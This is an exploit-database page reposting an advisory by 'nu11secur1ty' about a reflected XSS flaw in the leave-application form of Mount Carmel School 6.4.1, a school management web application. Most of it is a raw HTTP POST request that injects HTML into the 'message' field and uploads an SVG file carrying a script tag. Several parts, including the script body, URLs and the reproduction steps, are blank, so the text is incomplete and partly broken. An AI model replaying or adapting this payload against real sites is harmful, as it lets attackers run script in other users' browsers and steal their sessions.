2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction

Our sensors found this exploit at:

Below is a copy:

2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction
## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction
## Author: nu11secur1ty
## Date: 10/14/2023
## Vendor:
## Software: 
## Reference:

## Description:
The user can manipulate the system by injecting an HTML code into the system without any restriction.
The function apply_leave is not sanitizing correctly. This could allow the user to inject this 
application by using HTML or Java Script with very malicious purposes etc...

STATUS: HIGH- Vulnerability

POST /user/apply_leave/add HTTP/1.1
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9
Content-Length: 1492
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5wuzslDN9siOCW0K
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Content-Disposition: form-data; name="homework_id"

Content-Disposition: form-data; name="apply_date"

Content-Disposition: form-data; name="from_date"

Content-Disposition: form-data; name="to_date"

Content-Disposition: form-data; name="leave_id"

Content-Disposition: form-data; name="message"

<a href="" target="_blank" rel="noopener nofollow ugc">
<img src="" style="border:1px solid black;max-width:100%;" alt="Photo of Byron Bay, one of Australia's best beaches!">
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">



## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.